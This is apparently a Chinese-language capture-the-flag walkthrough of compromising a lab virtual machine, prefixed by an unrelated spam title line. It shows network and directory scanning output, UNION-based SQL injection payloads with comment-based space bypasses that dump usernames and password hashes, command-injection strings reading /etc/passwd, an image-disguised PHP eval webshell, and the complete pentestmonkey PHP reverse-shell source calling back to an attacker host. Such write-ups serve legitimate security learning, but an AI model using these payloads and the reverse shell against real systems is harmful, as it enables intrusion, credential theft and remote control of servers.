聚成网络网站建设,电子商务专业学什么,网站正在建设源代码,网站建设充值入口文章目录 一#xff0c;信息收集1.网段探测2.端口扫描3.目录扫描 二#xff0c;信息分析三#xff0c;sql注入1.判断SQL注入2.查询显示位3.查询注入点4.查询库5.查询表6.查字段7. 查user表中的值8.登陆superadmin用户 四#xff0c;漏洞利用文件上传命令执行蚁剑连接 五信息收集1.网段探测2.端口扫描3.目录扫描 二信息分析三sql注入1.判断SQL注入2.查询显示位3.查询注入点4.查询库5.查询表6.查字段7. 查user表中的值8.登陆superadmin用户 四漏洞利用文件上传命令执行蚁剑连接 五反弹shell1.上传php木马文件2.本地监听 六提权 一信息收集
1.网段探测
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.163.28
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.163.152 d2:a6:97:bb:46:9d (Unknown: locally administered)
192.168.163.193 00:0c:29:01:34:57 VMware, Inc.
192.168.163.209 7c:b5:66:a5:f0:a5 Intel Corporate3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded2.端口扫描
┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.00056s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:01:34:57 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -p- 192.168.163.193
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-26 00:43 EST
Nmap scan report for 192.168.163.193
Host is up (0.0012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6ba824d6092fc99a8eabbc6e7d4eb9ad (RSA)
| 256 abe84f5338062c6af392e3974a0e3ed1 (ECDSA)
|_ 256 327690b87dfca4326310cd676149d6c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesnt have a title (text/html; charsetUTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:01:34:57 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
3.目录扫描
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.163.193 -x 403,404,500_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460Output File: /root/reports/http_192.168.163.193/_24-02-26_00-44-22.txtTarget: http://192.168.163.193/[00:44:22] Starting:
[00:44:41] 200 - 0B - /config.php
[00:44:51] 200 - 527B - /login.php
[00:44:52] 302 - 0B - /logout.php - login.php
[00:45:01] 200 - 594B - /register.php
[00:45:09] 301 - 320B - /uploads - http://192.168.163.193/uploads/ Task Completed┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.163.193 Gobuster v3.6
by OJ Reeves (TheColonial) Christian Mehlmauer (firefart)[] Url: http://192.168.163.193
[] Method: GET
[] Threads: 10
[] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[] Negative Status codes: 404
[] User Agent: gobuster/3.6
[] Timeout: 10sStarting gobuster in directory enumeration mode/uploads (Status: 301) [Size: 320] [-- http://192.168.163.193/uploads/]
/server-status (Status: 403) [Size: 303]
Progress: 220560 / 220561 (100.00%)Finished
二信息分析
访问http://192.168.163.193/login.php是一个登陆页面弱密码进不去 通过目录扫描访问扫http://192.168.163.193//register.php是一个注册页面注册账号登陆试试
登陆后发现是一个查询的页面猜测有sql注入不输入任何数据出现表单
三sql注入 我是用抓包形式进行sql注入个人认为比较方便 1.判断SQL注入
在OSINT后加一个页面不显示任何东西说明有sql注入 在查显示位猜测有空格过滤
2.查询显示位
空格过滤
/**/3.查询注入点
search-OSINT/**/union/**/select/**/1,2,3# 4.查询库
search-OSINT/**/union/**/select/**/1,2,database()#
5.查询表
searchOSINT/**/union/**/select/**/group_concat(table_name),2,3/**/from/**/information_schema.tables/**/where/**/table_schemawebapphacking# 6.查字段
OSINT/**/union/**/select/**/group_concat(column_name),2,3/**/from/**/information_schema.columns/**/where/**/table_nameusers# 7. 查user表中的值
searchOSINT/**/union/**/select/**/group_concat(user,:,pasword),2,3/**/from/**/users# user1:5d41402abc4b2a76b9719d911017c592,
user2:6269c4f71a55b24bad0f0267d9be5508,
user3:0f359740bd1cda994f8b55330c86d845,
test:05a671c66aefea124cc08b76ea6d30bb,
superadmin:2386acb2cf356944177746fc92523983,
test1:05a671c66aefea124cc08b76ea6d30bb,
admin:e64b78fc3bc91bcbc7dc232ba8ec59e0,
asd:e64b78fc3bc91bcbc7dc232ba8ec59e0https://www.somd5.com/
superadmin/Uncrackable8.登陆superadmin用户 四漏洞利用
文件上传 白名单 命令执行 在last name中发现执行点 空格过滤
system(cat${IFS}/etc/passwd)
system(cat$IFS$1/etc/passwd)查看uploads目录因为uploads只能上传图片格式的文件所有我们上传恶意的图片然后通过命令执行更改后缀名
system(ls${IFS}-al${IFS}/var/www/html/uploads)year2020这个是上传的目录
system(ls${IFS}-al${IFS}/var/www/html/uploads/year2020)上传恶意的图片GIF89a
?php eval($_POST[c]);?修改后缀
system(mv${IFS}/var/www/html/uploads/year2020/1.jpg${IFS}/var/www/html/uploads/year2020/1.php)
执行成功后查看访问
http://192.168.163.193/uploads/year2020/1.php蚁剑连接 五反弹shell
1.上传php木马文件
?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkeypentestmonkey.netset_time_limit (0);
$VERSION 1.0;
$ip 192.168.163.209;
$port 6666;
$chunk_size 1400;
$write_a null;
$error_a null;
$shell uname -a; w; id; /bin/bash -i;
$daemon 0;
$debug 0;if (function_exists(pcntl_fork)) {$pid pcntl_fork();if ($pid -1) {printit(ERROR: Cant fork);exit(1);}if ($pid) {exit(0); // Parent exits}if (posix_setsid() -1) {printit(Error: Cant setsid());exit(1);}$daemon 1;
} else {printit(WARNING: Failed to daemonise. This is quite common and not fatal.);
}chdir(/);umask(0);// Open reverse connection
$sock fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {printit($errstr ($errno));exit(1);
}$descriptorspec array(0 array(pipe, r), // stdin is a pipe that the child will read from1 array(pipe, w), // stdout is a pipe that the child will write to2 array(pipe, w) // stderr is a pipe that the child will write to
);$process proc_open($shell, $descriptorspec, $pipes);if (!is_resource($process)) {printit(ERROR: Cant spawn shell);exit(1);
}stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);printit(Successfully opened reverse shell to $ip:$port);while (1) {if (feof($sock)) {printit(ERROR: Shell connection terminated);break;}if (feof($pipes[1])) {printit(ERROR: Shell process terminated);break;}$read_a array($sock, $pipes[1], $pipes[2]);$num_changed_sockets stream_select($read_a, $write_a, $error_a, null);if (in_array($sock, $read_a)) {if ($debug) printit(SOCK READ);$input fread($sock, $chunk_size);if ($debug) printit(SOCK: $input);fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {if ($debug) printit(STDOUT READ);$input fread($pipes[1], $chunk_size);if ($debug) printit(STDOUT: $input);fwrite($sock, $input);}if (in_array($pipes[2], $read_a)) {if ($debug) printit(STDERR READ);$input fread($pipes[2], $chunk_size);if ($debug) printit(STDERR: $input);fwrite($sock, $input);}
}fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);function printit ($string) {if (!$daemon) {print $string\n;}
}?2.本地监听 六提权
呃这个提权。。。。。。。。。。。
在legacy目录下有一个可执行文件直接执行就是root权限
